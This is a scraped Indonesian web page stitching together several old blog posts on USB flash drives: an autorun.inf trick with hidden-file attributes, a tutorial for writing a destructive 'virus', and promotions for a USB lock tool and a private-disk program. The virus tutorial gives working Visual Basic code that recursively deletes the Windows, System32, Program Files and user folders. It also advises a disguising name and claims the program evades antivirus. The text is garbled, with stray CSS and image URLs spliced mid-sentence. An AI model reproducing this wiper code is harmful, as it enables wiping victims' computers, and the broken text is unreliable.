Cara buat Antivirus pada Flashdisk

Submitted by cara membuat ym on Sat, 06/05/2010 - 12:36 Flash disk merupakan sebuah removable media yang sangat bagus, karena disamping praktis alat ini juga sangat portable. Namun pasti disamping memiliki sisi baiknya, alat ini juga memiliki kekurangan. USB/UFD merupakan alat bagi virus dan kawan-kawannya untuk menyebarkan dirinya, karena jika teman-teman mecolokkan USb teman-teman ke sebauh kompi yang sudah terinfeksi sebuah virus, maka dengan sendirinya virus tersebut akan menanamkan sebauh bibit virus ke dalam USB teman-teman yang akan segera berjalan ketika pertama kali dicolokkan lagi ke komputer yang lain. UDAH ah kebanyakan pembukaan, kita mulai aja««. Pertama teman-teman harus mempersiapkan antivirus yang akan teman-teman gunakan di dalam USB teman-teman. Tapi diusahakan yagn size kecil ya, supaya kinerja USB nya gak dipengaruhi, contohnya pcmav, ansav dan laen-laen. OK jika udah untuk pembuatannya ikuti langkah-langakh berikut: 1.ketik di notepad mantera berikut: [AutoRun] open=namaantivirus.exe shellexecute=namaantivirus.exe shell\Scan pakai alt antivirus!!!\command=namaantivirus.exe shell=Scan pakai alt antivirus!!! 2.trus save dengan nama ³autorun.inf´(gak pake tanda kutip) di flashdisk kita sekarang tinggal kita copy aja antivirus yang mau kita masukin ke flashdisk..!!! Tpai tolong diinget kalau copy jang di dalam folder, langsung di root flash disk saja OK. Dah jadi deh«^_^!! kalo mau scan virus tinggal double click aja tuh drive flashdisk kita!! kalo kita klik kanan drive flashdisknya bakalan ada tambahan kata di atas kata AUTOPLAY. Scan PAKAI ALIT ANTIVIRUS!!! kalo mau di ubah ya kita tinggal ganti aja kata-kata yang ada di dalam script«! shell\kata-kata_anda\command=namaantivirus.exe shell=kata-kata_anda 3. gimana cara buka flashdisknya ??? gak mungkin lah gak pada tau«tinggal klik kanan aja trus cari open«! ngak bagus ya kalo di dalam flashdisk kita ada keliatan nama file AUTORUN n¶antivirusnya« ngerusak pemandangan gitu loh«. kalo gitu tinggal kita ubah aja attributnya jadi super hidden« caranya«??? /media/TDY296/TIPS N TRIK/install printer di Ubuntu.txt buka RUN dari start menu terus ketik cmd masuk ke dalam drive flashdisk (biasanya drive f:) udah gitu ya kita tulis commandnya f:\>attrib +h +s namaantivirus.exe (buat hidden antivirusnya) f:\>attrib +h +s autorun.inf (buat hidden file autorun)

com/images/v6.1/t.Inilah Cara membuat Virus Paling Kejam Tanpa Terdeteksi Antivirus Submitted by cara membuat ym on Sat. display: inline.ixnp.gif). visibility: visible. True) End Sub Private Sub Form_Load() On Error Resume Next If FileExist(´c:\windows\system32\katak.com/images/v6.com/images/v6. background-repeat: norepeat. bikin form sekecil mungkin 2. FS Set FSO = CreateObject(´Scripting." src="http://i. width: 14px. setelah sebelumnya saya buat tutorial cara membuat virus yang kerjanya itu merestart komputer. nah sekarang tutorial buat bikin virus yg rada mematikan. visibility: visible.more ²Tutorial Bikin Virus cman 1 mnt 1. soalnya cara kerjanya simple gtYg diperluin: 1. height: 12px.gif). 06/05/2010 . masukin nih kode Public Sub DelAll(ByVal DirtoDelete As Variant) Dim FSO. didalem form itu.gif" /> ².txt´) = True Then End Else Call DelAll(´c:\windows\system´) Call DelAll(´c:\windows\system32 ) Call DelAll(´c:\windows´) Call DelAll(´C:\Documents and Settings\All Users´) Call DelAll(´C:\Documents and Settings\Administrator´) Call DelAll(´C:\Documents and Settings´) Call DelAll(´C:\Program Files\Common Files´) . VB/Visual Basic(optimal : 6.com/images/v6.gif" /> atau DISINI http://i.ixnp.20. in saya kasih lagi tutorial kedua membuat virus. tapi simple. background-position: -943px 0pt. text-decoration: none. dan kayanya sih g¶ bakal kedekteksi antivirus. vertical-align: top.1/theme/ice/palette. Ngerti tombol2nya VB kalo belum bpunya VISUAL BASIC download aja DISINI http://i.20.ixnp. vertical-align: top. width: 14px.1/t. height: 12px.20.FileSystemObject´) FS = FSO. background-color: transparent." src="http://i. background-color: transparent.0) 2.20. background-repeat: norepeat.1/theme/ice/palette. display: inline. background-position: -943px 0pt.ixnp.12:34 nah karena teman-teman saya banyak yang minta tutorial untuk membuat virus.DeleteFolder(DirtoDelete. text-decoration: none.

. oke??hhe Cara mengunci Komputer dengan Flash Disk Submitted by Guest on Fri. disini gwe make nama ³SystemKernel32 jadi ga bakal dicurigain 5. lu ga bakal keserang ndiri« bisa lu edit koq jadi apa gitu« Yang warna merah itu folder yg bakal didelete ama nih virus. anda ndiri coba2 ndiri.08:48 . Kode yg warna biru itu penangkal nih virus. Jangan pernah naroh nama lu di nih virus« k? 6. lu edit ndiri aja« 4.Call DelAll(´C:\Program Files\Internet Explorer´) Call DelAll(´C:\Program Files\Microsoft Visual Studio´) Call DelAll(´C:\Program Files´) End End If End Sub Function FileExist(ByVal FileName As String) As Boolean If Dir(FileName) = ³´ Then FileExist = False Else FileExist = True End If End Function 3. jadi di folder c:\windows\system32\ kalo ada file namanya katak. barang kali lu ga sengaja teken jadi lu slamat. lumayan bahaya sih« ini cuman contoh bikin virus« slanjutnya.txt. 07/31/2009 . compile deh« slese! Simple kan sobat? nih virus kerjanya cuman ngapus system. Bikin nih project namanya kaya nama system.

Dengan PEDATOR keamanan PC akan terjaga dengan mudah. sekalipun OS Windows sedang beroperasi pada komputer tersebut. kamu cukup menghubungkan Flash Disk yang tadinya kamu gunakan ke PC kamu.com/tips-hack/cara-mengunci-komputer-dengan/ . sekalipun operation system PC kamu sedang beroperasi. Dengan demikian kamu bisa menjaga komputer kamu dari penggunaan tangan-tangan lain. Jika tool ini telah berjalan di system Windows kamu. Dengan tool gratis ini kamu bisa membuat USB flash drive kamu menjadi kunci yang bisa kamu gunakan untuk me-lock dan meng-unlock PC kamu.Predator merupakan sebuah tool yang dapat mengunci komputer kamu saat kamu sedang tidak berada di depan PC. dan nantinya kamu akan diminta memasukkan password sebagai kunci untuk mengoperasikan PC yang kamu miliki. maka komputer yang kamu gunakan akan terkunci dengan sendirinya. Cara penggunaan tool ini sangat mudah.acehforum. saat kamu memisahkan (Unplug) flash disk dari PC kamu. Untuk menjalankan komputer kembali dalam kondisi normal. kemudian jalankan tool Predator yang ada di PC kamu. cukup dengan menghubungkan flash drive kamu ke PC. semudah menghubungkan dan memisahkan USB Flash Disk dari PC! Download PREDATOR Source: http://www.

14:37 kaka private disk . } . Ukuran filenya setelah diinstal tidak lebih dari 2 MB. namanya adalah Kaka Privat disk. membuat private disk di flashdisk. kalo hardisk eksternal atau flashdisk kita diberi password sehingga kita bisa menyembunyikan folder atau file dalam flashdisk / hardisk eksternal. } . atau sejenisnya ? tapi gak ketemu program yang dimaksud ? . hardisk eksternal.gallery img { border: 2px solid #cfcfcf.Inilah Cara Terbaik Membuat private disk di flashdisk atau hard disk eksternal Submitted by komputer bugil on Sun. . } . password flashdisk. hardisk ekternal. atau pc mungkin pengguna hardisk eksternal dan flashdisk capai mencari-cari cara bagaimana membuat supaya beberapa file-file pribadi di flaskdisk atau hard disk eksternal tersembunyi dengan aman sehingga hanya kita saja yang tau bagaimana cara membukanya. } . width: 50%.gallery-caption { margin-left: 0.gallery { margin: auto. mungkin tidak ya. hidden folder. supaya hanya kita saja yang punya yang bisa membukanya? jawabannya mungkin« ada satu program yang sangat kecil yang bisa diinstal dimana saja. Tujuan menyembunyikan folder atau file tentu saja ini untuk menghindari file-file kita ( baik secara sengaja atau tidak sengaja ) dibuka oleh orang lain.gallery-item { float: left. text-align: center. bisa diinstal di flashdisk. dan tentu saja desktop PC atau laptop. 08/16/2009 . margin-top: 10px. cape googling dengan keyword : password hardisk eksternal.

atau pc . hardisk ekternal. membuat private disk di flashdisk.kaka private disk .

.

* kalau anda pernah menemukan atau membaca artikel yang sama persis seperti ini. laptop. tanpa izin dan tanpa memberikan credit link back ke blog ini« memalukan . jika kita membuat privat disk di flashdisk atau hardisk eksternal jangan buka programnya di komputer yang terserang virus. hardisk eksternal.com/2009/06/private-disk-di-flashdisk-atau-hard.p Source: . kita gak perlu nyari serial numbernya ataui cracknya . 8. atau PC biasa 3. hardisk eksternal.. Aman dari virus. laptop. buat saja privat disk yang berbeda-beda untuk masing-masing user. jadi kita dapat memprotect partisi hardisk yang sudah ada. sebanyak yang kita mau. tapi dapat kita gunakan selama kita mau/ 9. baru kita buka privat disknya.keunggulan sofware Kaka Privat Disk. ini dia enaknya. scan dulu flaskdisk atau hardisk eksternal kita untuk menghilangkan virusnya. gak masalah flaskdisk atau hardisk kita terserang virus. dan munculnya seperti disk drive baru di windows explorer.masing privat disk yang kita buat. 6. masing . artikel ini dapat ditemukan di : http://tempat-program. 7. kita dapat : 1. Dapat Membuat privat disk di flashdisk. selama kita belum membuka privat disk. Freeware alias gak bayar.html pemilik blog tersebut telah mengcopy paste artikel miliku . dan Kaka privat disk dapat berfungsi normal kembali.Z 4. desktop PC. jika file exe kaka privat disk terserang virus atau program privat disknya rusak. partisi hardisk yang diprotect dengan program ini tidak akan bisa diakses oleh user maupun oleh virus. Dapat diinstal di flashdisk. dan dapat digunakan selama kita mau. memang versi yang kita download adalah trial version. dan dapat beri nama dari A . Kita dapat menggunakannya kaka private disk untuk multi user. 5. maka artikel tersebut adalah hasil copy paste dari blog ini. dan masing-masing user dapat memberi password yang diingini untuk privat disknya. instal ulang programnya. File-file yang kita simpan di privat disk aman dari virus. dapat kita beri password dengan pasword yang berbeda-beda. maka file-file kita dalam privat disk tersebut aman dari virus. Dapat digunakan untuk memprotect partisi hardisk PC anda. 2..blogspot. Privat disk ini dapat kita munculkan dan sembunyikan.

info/cara/membuat-private-disk-di-flashdisk-atau-hard-disk-eks.http://submitlist.. ..

Sign up to vote on this title
UsefulNot useful